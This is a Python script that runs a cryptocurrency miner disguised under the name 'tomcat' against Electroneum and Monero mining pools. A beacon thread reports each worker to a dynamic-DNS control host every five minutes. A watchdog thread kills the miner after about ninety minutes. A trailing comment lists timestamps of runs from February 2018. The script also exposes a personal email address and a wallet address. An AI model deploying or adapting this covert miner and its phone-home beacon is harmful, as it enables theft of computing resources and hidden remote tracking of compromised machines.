import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:06.066153
#2018-02-17 16:57:01.373912
#2018-02-17 18:44:06.393687
#2018-02-17 20:34:05.435631
#2018-02-17 22:20:07.782377
#2018-02-18 00:04:06.446271
#2018-02-18 01:55:04.640646
#2018-02-18 03:43:07.020807
#2018-02-18 05:30:09.065417
#2018-02-18 07:22:06.924855
#2018-02-18 09:10:07.781735
#2018-02-18 10:56:05.377535
#2018-02-18 12:43:01.839139
#2018-02-18 14:29:06.108466
#2018-02-18 16:19:06.709207
#2018-02-18 18:09:05.969625
#2018-02-18 19:55:06.334937
#2018-02-18 21:42:01.493620
#2018-02-18 23:31:01.735222
#2018-02-19 01:17:06.051762
#2018-02-19 03:04:06.872561
#2018-02-19 04:50:03.859048
#2018-02-19 06:35:06.483408
#2018-02-19 08:24:06.624805
#2018-02-19 10:14:05.323457
#2018-02-19 12:03:01.996897
#2018-02-19 13:50:01.528435
#2018-02-19 15:39:04.810768
#2018-02-19 17:26:09.027337
#2018-02-19 19:15:02.287041
#2018-02-19 21:04:05.550286
#2018-02-19 22:52:08.007942
#2018-02-20 00:35:08.787360
#2018-02-20 02:24:02.200227
#2018-02-20 04:14:04.912220
#2018-02-20 05:57:06.886948
#2018-02-20 07:43:01.455737
#2018-02-20 09:28:06.978927
#2018-02-20 11:12:04.241970
#2018-02-20 12:59:09.835543
#2018-02-20 14:44:01.956571
#2018-02-20 16:29:02.235813
#2018-02-20 18:18:04.293416
#2018-02-20 20:08:01.604814
#2018-02-20 21:54:06.577487
#2018-02-20 23:35:07.560319
#2018-02-21 01:19:01.975522
#2018-02-21 03:06:01.851749
#2018-02-21 04:54:05.076862
#2018-02-21 06:42:04.137440
#2018-02-21 08:29:01.688841
#2018-02-21 10:14:07.736894
#2018-02-21 12:03:05.332021
#2018-02-21 13:53:04.795605
#2018-02-21 15:39:11.303205
#2018-02-21 17:31:02.014318
#2018-02-21 19:18:13.876788
#2018-02-21 21:06:07.798637
#2018-02-21 22:53:07.287125
#2018-02-22 00:40:08.471765
#2018-02-22 02:29:06.037207
#2018-02-22 04:16:06.186869
#2018-02-22 06:01:03.931995
#2018-02-22 07:46:07.562047
#2018-02-22 09:34:05.590134
#2018-02-22 11:20:13.090402
#2018-02-22 13:07:04.794490
#2018-02-22 14:57:09.293644
#2018-02-22 16:42:11.139405
#2018-02-22 18:29:06.594230
#2018-02-22 20:24:07.604844
#2018-02-22 22:09:06.616170
#2018-02-22 23:55:08.728065
#2018-02-23 01:44:03.829668
#2018-02-23 03:35:04.143040
#2018-02-23 05:21:07.135604
#2018-02-23 07:08:02.133830
#2018-02-23 08:58:05.771828
#2018-02-23 11:15:08.443598
#2018-02-23 13:10:05.892073
#2018-02-23 14:55:02.763956
#2018-02-23 16:45:04.172604
#2018-02-23 18:33:04.311100
#2018-02-23 20:23:02.092965
#2018-02-23 22:09:03.876324
#2018-02-23 23:56:04.473358
#2018-02-24 01:47:01.440555
#2018-02-24 03:41:04.050056
#2018-02-24 06:27:01.825923
#2018-02-24 08:16:02.028929
#2018-02-24 09:59:04.282645
#2018-02-24 11:56:04.180144
#2018-02-24 13:45:06.655956
#2018-02-24 15:33:04.929920
#2018-02-24 17:27:06.682549
#2018-02-24 19:14:07.653741
#2018-02-24 21:01:07.529441
#2018-02-24 23:33:01.234020
#2018-02-25 02:55:05.610035
#2018-02-25 07:04:05.015997